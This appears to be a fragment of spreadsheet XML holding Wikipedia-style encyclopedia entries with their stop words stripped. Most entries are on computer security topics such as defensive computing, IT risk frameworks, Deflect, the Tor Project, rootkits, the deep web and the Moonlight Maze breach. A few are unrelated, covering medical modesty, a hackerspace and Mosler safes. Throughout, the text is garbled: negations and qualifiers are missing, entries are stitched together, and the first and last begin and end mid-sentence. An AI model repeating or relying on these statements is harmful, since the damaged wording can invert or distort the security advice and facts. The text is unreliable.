itself. malware could vulnerabilities anti-malware launch malicious code. anti-malware works scanning files network connections known signatures. those signatures never date. able scan network connections, encryptions (ssl/tls) need bypassed even broken anti-malware software. when monitoring emails anti-malware opens attachments analysis, scanner used starting point malware. attackers need send malware mailbox scanned automatically. questionable malware scanners even useful all. mozilla developer rober o'callahan writes blog anti malware software disabled (except windows defender) skepticism important aspect defensive computing users skeptical data access internet. malicious software exist multitude different forms many misleading general computer users even anti-malware software. defensive users think critically information access, reduce chances downloading spreading malicious software. strategies include scanning email attachments prior opening manually filtering suspicious emails inboxes. users aware persuasive subject lines headings emails address, actually contain malicious software spam, mislead users false advertisement resulting identity theft. defensive users scan files download prior opening also configure computers show file extensions, revealing potentially dangerous files appear harmless. skepticism also applied websites visited users. emails, users false advertisements. also, malicious software unknowingly downloaded infect computer, visiting certain website. backup recovery procedures despite efforts defensive computer user, loss important data occur malware, power outages, equipment failure general misuse. although loss data cannot completely prevented, defensive users take steps minimize amount data lost restore systems previous state. backup files defensive strategy unintentional data loss regular backup important files. users make multiple copies important data store either computer another device compact disc external hard drive. users also upload important files internet, provided access internet storage services. restoration some operating systems give users option performing procedure restores computer predetermined state. option available, user obtain appropriate restoration software system. event system failure serious case data loss, user restore lost changed files remove malicious files previously exist. good practices protecting data regularly backup important files, documents emails. administrator account day-to-day activities. keep software up-to-date latest versions. keep antivirus antispyware up-to-date latest versions. different passwords disable auto feature flash drives. some viruses, specially worms, spread automatically flash drives always connect internet behind firewall when doubt, throw also stopping e-mail abuse phishing computer insecurity end-user computing network security computer worm computer security defense strategy (computing) references external links defensive computing priorities michael horowitz december 2009</t>
  </si>
  <si>
    <t>Risk factor (computing)</t>
  </si>
  <si>
    <t>information security, risk factor collective name circumstances affecting likelihood impact security risk. definitions fair factor analysis information risk (fair) devoted analysis different factors influencing risk. decompose various levels, starting first level loss event frequency probable loss magnitude, going examining asset, threat agent capability compared vulnerability (computing) security control (also called countermeasure) strength, probability agent contact actually asset, organization capability react event impact stakeholders. isaca risk factors factors influence frequency and/or business impact risk scenarios; different natures, classified major categories: environmental, subdivided internal environmental factors are, large extent, control enterprise, although always easy change. external environmental factors are, large extent, outside control enterprise. capability organization, subdivided risk management capabilities—to extent enterprise mature performing risk management processes defined risk framework capabilities—how good enterprise performing processes defined cobit it-related business capabilities value management)—how closely enterprise’s value management activities align expressed processes risk scenario risk risk scenario description related event lead business impact, occur. risk factors also interpreted causal factors scenario materialising, vulnerabilities weaknesses. these terms often used risk management frameworks.risk scenario characterized threat actor internal organization (employee, contractor) external organization (competitor, business partner, regulator, god) threat type malicious, accidental failure natural event disclosure, modification theft destruction design ineffective execution inappropriate asset resource people organization process infrastructure facilities infrastructure information application time duration timing occurrence (critical not) timing detect timing reactthe risk scenario structure differentiates loss events (events generating negative impact), vulnerabilities vulnerability events (events contributing magnitude frequency loss events occurring), threat events (circumstances events trigger loss events). important confuse risks throw large risk list. also asset attack (computing) countermeasure (computer) computer security computer insecurity information security information security management isaca information security management system iso/iec 27001 risk risk risk management open group threat (computer) security control security risk security service (telecommunication) vulnerability (computing) references</t>
  </si>
  <si>
    <t>Deflect.ca</t>
  </si>
  <si>
    <t>deflect ddos mitigation website security service equalitie, canadian social enterprise developing open reusable systems focus privacy, resilience self-determination, protect promote human rights press freedom online. history deflect founded digital security expert trainer dmitri vitaliev canadian internet entrepreneur david mason 2011. deflect project predates similar initiatives google's project shield cloudflare's project galileo. initiative created response influential report berkman center internet society highlighted prevalence ddos means political repression censorship independent media human rights groups around world, recommended practical methods protect websites future incidents. company claims reach approximately population connected internet annual basisdeflect offers free services many civil society organizations commercial plans small business enterprise.in 2016, deflect team released first investigative report attacks ukrainian independent media website. ""on february, kotsubynske website published article meeting regional administrative council stated members political party 'new faces' interfering trying sabotage council's work stopping deforestation. attacks website begin thereafter."also 2016, noted deflect thwarted ddos attacks black lives matter. investigations lead deflect team discover methods provenance hundred separate incidents black lives matter website, noted verge, technica boingboing.in 2019, deflect team discovered persistent cyber offensive campaign uzbek human rights activists, leading detailed study amnesty international. other instances intervention deflect received recognition include gamergate, 2012 rakhine state riots, 2013 iranian presidential election fifa corruption conspiracy.in 2017, scott neigh, host podcast talking radical radio, spoke founder dmitri vitaliev deflect.ca defends social movements digital threats. 2020, washington post reported deflect.ca protecting vulnerable civil society organizations. also denial-of-service attack ddos mitigation references external links official website</t>
  </si>
  <si>
    <t>The Tor Project</t>
  </si>
  <si>
    <t>project, inc. seattle-based 501(c)(3) research-education nonprofit organization founded computer scientists roger dingledine, nick mathewson five others. project primarily responsible maintaining software anonymity network. history project founded december 2006 computer scientists roger dingledine, nick mathewson five others. electronic frontier foundation (eff) acted project's fiscal sponsor early years, early financial supporters project included u.s. international broadcasting bureau, internews, human rights watch, university cambridge, google, netherlands-based stichting nlnet.in october 2014, project hired public relations firm thomson communications order improve public image (particularly regarding terms "dark net" "hidden services") educate journalists technical aspects tor.in 2015, project ended cloud service.in december 2015, project announced hired shari steele, former executive director electronic frontier foundation, executive director. roger dingledine, acting interim executive director since 2015, remained project director board member. later month, project announced open technology fund would sponsoring bounty program coordinated hackerone. program initially invite-only focuses finding vulnerabilities specific project's applications.on 2016 project employee jacob appelbaum stepped position; announced june two-line statement tor. over following days, allegations sexual mistreatment made public several people.on july 2016, complete board project meredith hoban dunn, goldberg, julius mittenzwei, rabbi thomas, wendy seltzer, roger dingledine nick mathewson replaced matt blaze, cindy cohn, gabriella coleman, linus nordberg, megan price bruce schneier. anti-harassment policy approved board, well conflicts interest policy, procedures submitting complaints, internal complaint review process. affair continues controversial, considerable dissent within community.in 2020, covid-19 pandemic, project's core team employees, leaving working staff people. funding 2012, project's million annual budget came united states government, u.s. state department, broadcasting board governors, national science foundation major contributors, democracy advocates authoritarian states". swedish government organizations provided 20%, including ngos thousands individual sponsors. dingledine said united states department defense funds similar research grant procurement contract. executive director andrew lewman said even though accepts funds u.s. federal government, service collaborate reveal identities users.in june 2016, project received award mozilla's open source support program (moss). award significantly enhance network's metrics infrastructure performance stability network monitored improvements made appropriate." tools metrics portalanalytics network, including graphs available bandwidth estimated userbase. this great resource researchers interested detailed statistics tor.nyxa terminal (command line) application monitoring configuring tor, intended command-line enthusiasts connections. this functions much like system usage, providing real time information tor's resource utilization state.onionooweb-based protocol learn currently running relays bridges.onionsharean open source tool allows users securely anonymously share file size.ooni (open observatory network interference (ooni))a global observation network, monitoring network censorship, aims collect high-quality data using open methodologies, using free open source software (fl/oss) share observations data various types, methods, amounts network tampering world.orbottor google android devices, collaboration guardian projectorliba library android application route internet traffic orbot/tor.pluggable transports (pt)helps circumvent censorship. transforms traffic flow client bridge. this way, censors monitor traffic client bridge innocent-looking transformed traffic instead actual traffic.relay searchsite providing overview network.shadowa discrete-event network simulator runs real software plug-in. shadow open-source software enables accurate, efficient, controlled, repeatable experimentation.stempython library writing scripts applications interact tor.tails (the amnesic incognito live system)a live cd/usb distribution preconfigured everything safely routed leaves trace local system.torfree software open network helps user defend traffic analysis, form network surveillance threatens personal freedom privacy, confidential business activities relationships, state security.tor browsera customization mozilla firefox uses circuit browsing anonymously features consistent mission.tor phone phone routes network traffic network. initially based copperheados custom rom, similar efforts continue calyxos, divestos, grapheneos independent roms.torbirdytorbutton thunderbird related *bird forks.txtorconpython twisted event-based implementation control protocol. unit-tests, state configuration abstractions, documentation. available pypi debian. recognition march 2011, project received free software foundation's 2010 award projects social benefit. citation read, "using free software, enabled roughly million people around world experience freedom access expression internet keeping control privacy anonymity. network proved pivotal dissident movements iran recently egypt."in september 2012, project received 2012 pioneer award, along jérémie zimmermann andrew huang.in november 2012, foreign policy magazine named dingledine, mathewson, syverson among global thinkers "for making safe whistleblowers".in 2014, roger dingledine, nick mathewson paul syverson received usenix test time award paper titled "tor: second-generation onion router", published proceedings 13th usenix security symposium, august 2004. also phone references external links official website website list mirror websites web.archive.org/web weekly news august 27th, 2014</t>
  </si>
  <si>
    <t>The Tor Project, Inc</t>
  </si>
  <si>
    <t>Delegated administration</t>
  </si>
  <si>
    <t>computing, delegated administration delegation control describes decentralization role-based-access-control systems. many enterprises centralized model access control. large organizations, model scales poorly teams become burdened menial role-change requests. these requests often used hire, fire, role-change events occur organization incur high latency times suffer weak security practices. such delegation involves assigning person group specific administrative permissions organizational unit. information management, used create teams perform specific (limited) tasks changing information within user directory database. goal delegation create groups minimum permissions grant ability carry authorized tasks. granting extraneous/superfluous permissions would create abilities beyond authorized scope work. best practice enterprise role management entails ldap groups. delegated administration refers decentralized model role group management. model, application process owner creates, manages delegates management roles. centralized team simply operates service directory, metadirectory, interface administration, related components. allowing application business process owner create, manage delegate groups supports much scalable approach administration access rights. metadirectory environment, roles groups could also "pushed" synchronized platforms. example, groups synchronized native operating systems microsoft windows access control list protects folder file. with metadirectory distributing groups, central directory central repository groups. some enterprise applications (e.g., peoplesoft) support ldap groups inherently. these applications capable using ldap call directory authorization activities. web-based group management tools used delegated administration therefore provide following capabilities using directory group repository: decentralized management groups (roles) access rights business- process-owners categorizing segmenting users characteristic, enumeration grouping users e-mail, subscription, access control reducing work process around maintenance groups reproducing groups multiple platforms disparate environments active directory microsoft active directory administrative permissions accomplished using delegation control wizard. types permissions include managing viewing user accounts, managing groups, managing group policy links, generating resultant policy, managing viewing inorgperson accounts. delegation control could give managers complete control users department. with arrangement managers create users, groups, computer objects, also access control identity management provisioning rbac reading list delegating authority active directory, technet magazine built-in groups delegation, windowssecurity.com</t>
  </si>
  <si>
    <t>Model-driven security</t>
  </si>
  <si>
    <t>model-driven security (mds) means applying model-driven approaches (and especially concepts behind model-driven software development) security. development concept general concept model-driven security earliest forms around since late 1990s (mostly university research), first commercialized around 2002. there also body later scientific research area, continues day. specific definition model-driven security specifically applies model-driven approaches automatically generate technical security implementations security requirements models. particular, "model driven security (mds) tool supported process modelling security requirements high level abstraction, using information sources available system (produced stakeholders). these inputs, expressed domain specific languages (dsl), transformed enforceable security rules little human intervention possible. explicitly also includes run-time security management (e.g. entitlements/authorisations), i.e. run-time enforcement policy protected systems, dynamic policy updates monitoring policy violations."model-driven security also well-suited automated auditing, reporting, documenting, analysis (e.g. compliance accreditation), relationships models technical security implementations traceably defined model-transformations. opinions industry analysts several industry analyst sources state "will significant impact information security infrastructure required become increasingly real-time, automated adaptive changes organisation environment". many information technology architectures today built support adaptive changes (e.g. service oriented architectures (soa) so-called platform-as-a-service "mashups" cloud computing), information security infrastructure need support adaptivity ("agility"). term devopssec (see devops) used analysts equivalent model-driven security. effects because automates generation re-generation technical security enforcement generic models, enables agility reduces complexity (and security complexity) increases policy flexibility supports rich application security policies supports workflow context sensitive security policies auto-generate infrastructure security policies supports reuse stakeholders minimises human errors auto-generate domain boundary security policies helps enable assurance accreditation (covered objectsecurity’s mdsa ebook) implementations apart academic proof-of-concept developments, commercially available full implementations model-driven security (for authorization management policy automation) include objectsecurity openpmf, earned listing gartner's "cool vendor" report 2008 advocated number organizations (e.g. u.s. navy means make authorization policy management easier automated. also model-driven architecture data-driven security authorization attribute based access control xacml role-based access control mandatory access control discretionary access control references</t>
  </si>
  <si>
    <t>Delegation (computer security)</t>
  </si>
  <si>
    <t>delegation process computer user handing authentication credentials another user. role-based access control models, delegation authority involves delegating roles user assume permissions user acquire, users. types delegation networks there essentially classes delegation: delegation authentication/identity level, delegation authorization/access control level. delegation authentication/identity level defined follows: authentication mechanism provides effective identity different validated identity user called identity delegation authentication level, provided owner effective identity previously authorized owner validated identity identity.the existing techniques identity delegation using sudo commands unix popular. sudo command, person first start session original identity. requires delegated account password explicit authorizations granted system administrator. user login delegation described patent mercredi frey also identity delegation. delegation authorization/access control level common ensuring computer security access control mechanisms provided operating systems unix, linux, windows, etc.if delegation specific rights, also known fine-grained, role-based access control (rbac) delegation, always risk under-delegation, i.e., delegator delegate necessary permissions perform delegated job. this cause denial service, undesirable environments, safety critical systems health care. rbac-based delegation, option achieve delegation reassigning permissions role delegatee; however, finding relevant permissions particular easy task large complex systems. moreover, assigning permissions delegatee role, users associated particular role delegated rights. delegation achieved assigning roles delegator delegatee would case over-delegation also problem delegator figure roles, complex hierarchy rbac, necessary perform particular job. these types problems present identity delegation mechanisms normally user interface simpler. more details found rbac. references</t>
  </si>
  <si>
    <t>The Secret History of Hacking</t>
  </si>
  <si>
    <t>secret history hacking 2001 documentary film focuses phreaking, computer hacking social engineering occurring 1970s 1990s. archive footage concerning subject matter (computer generated) graphical imagery specifically created film voiced narrative audio commentary, intermixed commentary people another closely involved matters. film starts reviewing concept early days phreaking, featuring anecdotes phreaking experiences (often involving blue box) recounted john draper denny teresi. commentary steve wozniak, film progresses phreaking computer hobbyist hacking (including anecdotal experiences homebrew computer club) computer security hacking, noting differences forms hacking process. featured computer security hacking social engineering stories anecdotes predominantly concern experiences involving kevin mitnick. film also deals society's (and notably enforcement's) fear hacking increased time media attention hacking film wargames well journalistic reporting actual hackers) combined society's increase adoption subsequent reliance computing communication networks. john draper, steve wozniak kevin mitnick prominently featured film additionally features comments else archive footage concerning denny teresi, joybubbles, mike gorman, rosenbaum, steven levy, paul loser, felsenstein, warren, john markoff, foster, special agent mcguire, jonathan littman, michael strickland others. also list films computers references external links secret history hacking imdb secret history hacking youtube</t>
  </si>
  <si>
    <t>The Rootkit Arsenal</t>
  </si>
  <si>
    <t>rootkit arsenal: escape evasion dark corners system book written bill blunden, published jones bartlett publishers 2009. book takes reader depth rootkit technology uses. covers topics ia-32 assembly, windows system architecture, kernel debugging, advanced rootkit development, much concerning rootkit technology applied onto e.g. white hacking. book also provides many source code examples rootkit development properly required recommended fair understanding computer programming operating systems order fully comprehend contents book, back cover states advanced book topic. content book divided four parts, chapters goes detail specific technology information required advanced rootkit development use. also provides information network file system analysises, kernel objects, drivers, much related rootkit technology. reader create fully working rootkit using source codes appendix. product description states book sheds light material traditionally poorly documented, partially documented, intentionally undocumented. reviews book received mostly positive reviews websites specializing computer reviews. computing reviews writes book "this book addresses controversial timely issue field network security. rootkits notoriously used black hacking community. rootkit allows attacker subvert compromised system. this subversion take place application level, case early rootkits replaced common administrative tools, dangerous occurs kernel level. rootkit hides network traffic, processes, files attacker decides keep invisible administrators system management tools… work defensive solutions—anti-virus malware detection tools—or interested low-level system programming, must read book. fact, intended audience, best books 2009."richard austin ieee's computer society's technical committee security privacy also published review book's second edition 2014. notes references blunden, bill. rootkit arsenal: escape evasion dark corners system. jones bartlett publishers, 2009 blunden, bill. rootkit arsenal: escape evasion dark corners system. jones bartlett publishers, 2012</t>
  </si>
  <si>
    <t>Modesty in medical settings</t>
  </si>
  <si>
    <t>modesty medical settings refers practices equipment used preserve patient modesty medical examination clinics. tools modesty prior invention stethoscope, physician wanted perform auscultation listen heart sounds noise inside body would physically place body person examined. 1816, male physician rené laennec invented stethoscope respect modesty female patient, would awkward chest.hospital gowns increase modesty compared patient presenting nude, past clothing exposes body. some contemporary changes design hospital gowns proposed. society culture places cultural diversity becomes likely people make different requests modesty health care. special populations sometimes women access healthcare modesty concerns.muslims non-muslim societies sometimes make requests modesty. references external links patientmodesty.org/, united states-based nonprofit organization advocating modesty</t>
  </si>
  <si>
    <t>Deep web</t>
  </si>
  <si>
    <t>deep web, invisible web, hidden parts world wide whose contents indexed standard search-engines. this contrast "surface web", accessible anyone using internet. computer-scientist michael bergman credited coining term 2001 search-indexing term.the content deep hidden behind login forms, includes uses mail, online banking, restricted access social-media pages profiles, forums code language require registration viewing content, paywalled services video demand online magazines newspapers. content deep located accessed direct address, require password security access past public pages. terminology first conflation terms "deep web" "dark web" came 2009 deep search terminology discussed together illegal activities taking place freenet darknet. those criminal activities include commerce personal passwords, false identity documents, drugs, firearms, child pornography.since then, media's reporting silk road, media outlets taken using 'deep web' synonymously dark darknet, comparison reject inaccurate consequently become ongoing source confusion. wired reporters zetter andy greenberg recommend terms used distinct fashions. while deep reference site cannot accessed traditional search engine, dark portion deep intentionally hidden inaccessible standard browsers methods. non-indexed content bergman, paper deep published journal electronic publishing, mentioned jill ellsworth used term invisible 1994 refer websites registered search engine. bergman cited january 1996 article frank garcia: would site that's possibly reasonably designed, bother register search engines. find them! you're hidden. call invisible web. another early term invisible bruce mount matthew koll personal library software, description deep tool found december 1996 press release.the first specific term deep web, generally accepted, occurred aforementioned 2001 bergman study. indexing methods methods prevent pages indexed traditional search engines categorized following: contextual web: pages content varying different access contexts (e.g., ranges client addresses previous navigation sequence). dynamic content: dynamic pages, returned response submitted query accessed form, especially open-domain input elements (such text fields) used; fields hard navigate without domain knowledge. limited access content: sites limit access pages technical (e.g., using robots exclusion standard captchas, no-store directive, prohibit search engines browsing creating cached copies). sites feature internal search engine exploring pages. non-html/text content: textual content encoded multimedia (image video) files specific file formats handled search engines. private web: sites require registration login (password-protected resources). scripted content: pages accessible links produced javascript well content dynamically downloaded servers flash ajax solutions. software: certain content intentionally hidden regular internet, accessible special software, tor, i2p, darknet software. example, allows users access websites using .onion server address anonymously, hiding address. unlinked content: pages linked pages, prevent crawling programs accessing content. this content referred pages without backlinks (also known inlinks). also, search engines always detect backlinks searched pages. archives: archival services wayback machine enable users archived versions pages across time, including websites become inaccessible indexed search engines google. wayback machine called program viewing deep web, archives present cannot indexed, past versions websites impossible view search. websites updated point, archives considered deep content. content types while always possible directly discover specific server's content indexed, site potentially accessed indirectly (due computer vulnerabilities). discover content web, search engines crawlers follow hyperlinks known protocol virtual port numbers. this technique ideal discovering content surface often ineffective finding deep content. example, crawlers attempt find dynamic pages result database queries indeterminate number queries possible. noted (partially) overcome providing links query results, could unintentionally inflate popularity member deep web. deeppeep, intute, deep technologies, scirus, ahmia.fi search engines accessed deep web. intute funding temporary static archive july 2011. scirus retired near january 2013.researchers exploring deep crawled automatic fashion, including content accessed special software tor. 2001, sriram raghavan hector garcia-molina (stanford computer science department, stanford university) presented architectural model hidden-web crawler used terms provided users collected query interfaces query form crawl deep content. alexandros ntoulas, petros zerfos, junghoo ucla created hidden-web crawler automatically generated meaningful queries issue search forms. several form query languages (e.g., dequel) proposed that, besides issuing query, also allow extraction structured data result pages. another effort deeppeep, project university utah sponsored national science foundation, gathered hidden-web sources (web forms) different domains based novel focused crawler techniques.commercial search engines begun exploring alternative methods crawl deep web. sitemap protocol (first developed, introduced google 2005) oai-pmh mechanisms allow search engines interested parties discover deep resources particular servers. both mechanisms allow servers advertise urls accessible them, thereby allowing automatic discovery resources directly linked surface web. google's deep surfacing system computes submissions html form adds resulting html pages google search engine index. surfaced results account thousand queries second deep content. system, pre-computation submissions done using three algorithms: selecting input values text search inputs accept keywords, identifying inputs accept values specific type (e.g., date) selecting small number input combinations generate urls suitable inclusion search index.in 2008, facilitate users hidden services access search hidden .onion suffix, aaron swartz designed tor2web—a proxy application able provide access means common browsers. using application, deep links appear random string letters followed .onion top-level domain. also darpa's memex program deep linking references further reading external links media related deep wikimedia commons</t>
  </si>
  <si>
    <t>Risk Management Framework</t>
  </si>
  <si>
    <t>risk management framework (rmf) united states federal government guideline, standard process risk management help secure information systems (computers networks) developed national institute standards technology. risk management framework (rmf), illustrated diagram right, provides disciplined structured process integrates information security, privacy risk management activities system development life cycle. overview main document describes details nist special publication 800-37, "risk management framework information systems organizations: system life cycle approach security privacy". this second revision document supersedes first revision "guide applying risk management framework federal information systems".the various steps link several nist standards guidelines, including nist special publication 800-53, "security privacy controls information systems organizations". steps include: prepare execute establishing context priorities managing security privacy risk organizational system levels. categorize information system information processed, stored, transmitted system based impact analysis. select initial baseline security controls information system based security categorization; tailoring supplementing security control baseline needed based organizational assessment risk local conditions. overlays apply system added step. implement security controls identified step assess: third party assesses controls verifies controls properly applied system. authorize: information system granted denied authorization operate (ato), cases postponed certain items fixed. based report assessment phase. typically granted years process needs repeated period. monitor security controls information system continuously pre-planned fashion documented earlier process. history e-government 2002 (public 107-347) entitled fisma 2002 (federal information security management act) passed 2002 protect economic national security interests united states related information security.congress later passed fisma 2014 (federal information security modernization act) provide improvements fisma 2002 codifying department homeland security (dhs) authority administer implementation information security policies non-national security federal executive branch systems, including providing technical assistance deploying technologies systems; amending clarifying office management budget's (omb) oversight authority federal agency information security practices; requiring amend revise a-130 "eliminate inefficient wasteful reporting."fisma required protecting information information systems unauthorized access, use, disclosure, disruption, modification, destruction order provide confidentiality, integrity availability. title fisma 2002 tasked nist responsibilities standards guidelines, including development standards used federal agencies categorize information information systems collected maintained behalf agency based objectives providing appropriate levels information security according range risk levels. this task satisfied fips publication 199; guidelines recommending types information information systems included category. this task satisfied nist special publication 800-60, volumes minimum information security requirements (i.e., management, operational, technical controls), information information systems category. this task satisfied development fips publication 200.nist 800-37 (risk management framework rmf) developed help organizations manage security privacy risk, satisfy requirements federal information security modernization 2014 (fisma), privacy 1974, policies, federal information processing standards, among laws, regulations, policies. risks during lifecycle, information system encounter many types risk affect overall security posture system security controls must implemented. process supports early detection resolution risks. risk categorized high level infrastructure risks, project risks, application risks, information asset risks, business continuity risks, outsourcing risks, external risks strategic risks. infrastructure risks focus reliability computers networking equipment. project risks focus budget, timeline system quality. application risks focus performance overall system capacity. information asset risks focus damage, loss disclosure unauthorized part information assets. business continuity risks focus maintaining reliable system maximum up-time. outsourcing risks focus impact party supplier meeting requirements. external risks items outside information system control impact security system. strategic risks focuses need information system functions align business strategy system supports. revision updates major objectives update revision included following: provide closer linkage communication risk management processes activities c-suite governance level organization individuals, processes, activities system operational level organization; institutionalize critical risk management preparatory activities risk management levels facilitate effective, efficient, cost-effective execution rmf; demonstrate nist cybersecurity framework aligned implemented using established nist risk management processes; integrate privacy risk management processes better support privacy protection needs privacy programs responsible; promote development trustworthy secure software systems aligning life cycle-based systems engineering processes nist 800-160 volume relevant tasks rmf; integrate security-related, supply chain risk management (scrm) concepts address untrustworthy suppliers, insertion counterfeits, tampering, unauthorized production, theft, insertion malicious code, poor manufacturing development practices throughout sdlc; allow organization-generated control selection approach complement traditional baseline control selection approach support consolidated control catalog nist 800-53 revision 5.revision also added "prepare" step position zero achieve effective, efficient, cost-effective security privacy risk management processes. also department defense information assurance certification accreditation process (diacap, previous program) nist cybersecurity framework cyber risk quantification references external links nist special publication 800-37 revision guide applying risk management framework federal information systems risk management framework overview control indexer guide mapping types information information systems security categories</t>
  </si>
  <si>
    <t>Risk IT</t>
  </si>
  <si>
    <t>risk provides end-to-end, comprehensive view risks related information technology (it) similarly thorough treatment risk management, tone culture top, operational issues. risk published 2009 isaca. result work group composed industry experts academics different nations, coming organizations ernst young, ibm, pricewaterhousecoopers, risk management insight, swiss life,and kpmg. definition risk part business risk—specifically, business risk associated use, ownership, operation, involvement, influence adoption within enterprise. consists it-related events could potentially impact business. occur uncertain frequency magnitude, creates challenges meeting strategic goals objectives.management business risk essential component responsible administration organization. owing it's importance overall business, risk treated like business risks. risk framework explains risk enables users integrate management risk overall compare assessed risk risk appetite risk tolerance organization understand manage riskit risk managed business leaders inside organization: technical issue department. risk categorised different ways: benefit/value enabler risks related missed opportunity increase business value enabled improved processes programme/project delivery risks related management related projects intended enable improve business: i.e. risk budget late delivery delivery all) projects operation service delivery risks associated operations service delivery bring issues, inefficiency business operations organizationthe risk framework based principles enterprise risk management standards/frameworks committee sponsoring organizations treadway commission 31000. risk could understood upper management. risk principles risk built around following principles: always align business objectives align risk management balance costs benefits risk management promote fair open communication risks establish right tone defining enforcing accountability continuous process part daily activities risk communication components major risk communication flows are: expectation: organization expects final result expected behaviour employee management; encompasses strategy, policies, procedures, awareness training capability: indicates organization able manage risk status: information actual status risk; encompasses risk profile organization, risk indicator (kri), events, root cause loss events.an effective information clear concise useful timely aimed correct target audience available need know basis risk domains processes three domains risk framework listed contained processes (three domain); process contains number activities: risk governance: ensure risk management practices embedded enterprise, enabling secure optimal risk-adjusted return. based following processes:rg1 establish maintain common risk view rg1.1 perform enterprise risk assessment rg1.2 propose risk tolerance thresholds rg1.3 approve risk tolerance rg1.4 align risk policy rg1.5 promote risk aware culture rg1.6 encourage effective communication risk integrate with rg2.1 establish maintain accountability risk management rg2.2 coordinate risk strategy business risk strategy rg2.3 adapt risk practices enterprise risk practices rg2.4 provide adequate resources risk management rg2.5 provide independent assurance risk management make risk-aware business decisions rg3.1 gain management risk analysis approach rg3.2 approve risk analysis rg3.3 embed risk consideration strategic business decision making rg3.4 accept risk rg3.5 prioritise risk response activities risk evaluation: ensure it-related risks opportunities identified, analysed presented business terms. based following processes: collect data re1.1 establish maintain model data collection re1.2 collect data operating environment re1.3 collect data risk events re1.4 identify risk factors analyse risk re2.1 define risk analysis scope re2.2 estimate risk re2.3 identify risk response options re2.4 perform peer review risk analysis maintain risk profile re3.1 resources business processes re3.2 determines business criticality resources re3.3 understand capabilities re3.4 update risk scenario components re3.5 maintain risk register risk re3.6 develop risk indicators risk response: ensure it-related risk issues, opportunities events addressed cost-effective manner line business priorities. based following processes: articulate risk rr1.1 communicate risk analysis results rr1.2 report risk management activities state compliance rr1.3 interpret independent assessment findings rr1.4 identify related opportunities manage risk rr2.1 inventory controls rr2.2 monitor operational alignment risk tolerance thresholds rr2.3 respond discovered risk exposure opportunity rr2.4 implement controls rr2.5 report risk action plan progress react events rr3.1 maintain incident response plans rr3.2 monitor risk rr3.3 initiate incident response rr3.4 communicate lessons learned risk eventseach process detailed process components management practice inputs outputs raci charts goal metricsfor domain maturity model depicted. risk evaluation link risk scenarios ultimate business impact needs established understand effect adverse events. risk prescribe single method. different methods available. among are: cobit information criteria balanced scorecard extended balanced scorecard westerman coso factor analysis information risk risk scenarios risk scenarios hearth risk evaluation process. scenarios derived different complementary ways: top-down approach overall business objectives likely risk scenarios impact them. bottom-up approach list generic risk scenarios applied organizaztion situationeach risk scenarios analysed determining frequency impact, based risk factors. risk response purpose defining risk response bring risk line overall defined risk appetite organization risk analysis: i.e. residual risk within risk tolerance limits. risk managed according four main strategies combination them): risk avoidance, exiting activities give rise risk risk mitigation, adopting measures detect, reduce frequency and/or impact risk risk transfer, transferring others part risk, outsourcing dangerous activities insurance risk acceptance: deliberately running risk identified, documented measured.key risk indicators metrics capable showing organizaztion subject high probability subject risk exceeds defined risk appetite. practitioner guide second important document risk practitioner guide. made eight sections: defining risk universe scoping risk management risk appetite risk tolerance risk awareness, communication reporting expressing describing risk risk scenarios risk response prioritisation risk analysis workflow mitigation risk using cobit relationship isaca frameworks risk framework complements isaca’s cobit, provides comprehensive framework control governance business-driven information-technology-based (it-based) solutions services. while cobit sets good practices means risk management providing controls mitigate risk, risk sets good practices ends providing framework enterprises identify, govern manage risk. allows business managers business value investments, providing governance framework. used evaluate actions determined risk management process. relationship frameworks risk accept factor analysis information risk terminology evaluation process. 27005 comparison risk processes foreseen iso/iec 27005 standard, risk management#risk management methodology risk management#iso 27005 framework 31000 risk practitioner guide appendix contains comparison 31000 coso risk practitioner guide appendix contains comparison coso also cobit coso enterprise risk management factor analysis information risk (fair) isaca 31000 risk risk appetite risk factor (computing) risk management risk tolerance references external links risk main page isaca site</t>
  </si>
  <si>
    <t>Mothership HackerMoms</t>
  </si>
  <si>
    <t>mothership hackermoms nonprofit hackerspace/makerspace berkeley, california, founded 2011. first all-women hackerspace.,the 1000-square-foot space provides space members work projects hold events children onsite child care. they participated culture events maker faire, bizarre bazaar, oakland murmur, access another francisco area hackerspace, monster toys. members define mothership hackermoms hackerspace deliberately include open source free culture movements. members held workshops drupal illustrator, resin coating canvas, done painting, drawing, photography, made linoprints. also double union noisebridge references external links official website</t>
  </si>
  <si>
    <t>Mosler Safe Company</t>
  </si>
  <si>
    <t>mosler safe company manufacturer security equipment—most notably safes bank vaults—from 1874 bankruptcy 2001. mosler controlled founding family 1967, sold american standard companies. american standard sold division group mosler managers outside investors 1986. history company founded cincinnati gustave mosler fred bahmann mosler, bahmann company 1867. 1874 gustave's death, mosler family falling bahmann. family left mosler, bahmann company start mosler safe lock company. both companies remained cincinnati 1890s. when mosler safe lock outgrew original factory 1891, relocated hamilton, remained bankruptcy. mosler, bahmann company remained business around 1898.after years business, mosler filed chapter bankruptcy august 2001, citing continuing debt problems, ceased operations shortly thereafter. diebold subsequently announced programs support former mosler customers bought original company bankruptcy court months later. products mosler's safes vaults renowned strength precise manufacturing. several mosler vaults installed hiroshima's mitsui bank building prior wwii survived nuclear attack, fact company widely publicized marketing.when u.s. government began building bunkers silos cold war, mosler became contractor blast doors. them, installed atomic energy commission's ridge national laboratory, weighed approximately tons including frame. mosler built vault formerly used display store united states constitution declaration independence. mosler also built gold vaults united states bullion depository fort knox. despite weight, 58-ton blade could opened closed manually person. references</t>
  </si>
  <si>
    <t>Moonlight Maze</t>
  </si>
  <si>
    <t>moonlight maze 1999 government investigation massive data breach classified information. started 1996 affected nasa, pentagon, military contractors, civilian academics, doe, numerous american government agencies. 1999, moonlight maze task force composed forty specialists enforcement, military, government. investigators claimed information stolen printed stacked, would three times height washington monument, (169 tall. russian government blamed attacks, although initially little hard evidence back accusations besides russian address traced hack. moonlight maze represents first widely known cyber espionage campaigns world history. even classified advanced persistent threat serious designation stealthy computer network threat actors, typically nation state state-sponsored group) years constant assault. although moonlight maze regarded isolated attack many years, unrelated investigations revealed threat actor involved attack continued active employ similar methods recently 2016. methods attack hack began hackers building "back doors" could re-enter infiltrated systems steal data; also left behind tools reroute specific network traffic russia. everything exploited attacks came publicly available resources, creation. cases, exploits discovered system administrators intention informing others vulnerabilities present systems, instead manipulated malicious purposes. hackers found success since software manufacturers maintainers vigilant making sure flaws systems. they would leave known vulnerabilities unpatched long periods time, sometimes long months year, neglecting security patch cycles. this prior moonlight maze, no-one aware damage could done cyber attacks since internet still relatively new. result, extremely vulnerable difficult infiltrate, resulting largest data breaches classified information history. order conceal location throw investigators, hackers relayed connection various vulnerable institutions like universities, libraries, since servers hacked could last location routed (called proxying). outcome impact describing attack testimony congress, james adams, infrastructure defense inc, warned "the information shipped internet moscow sale 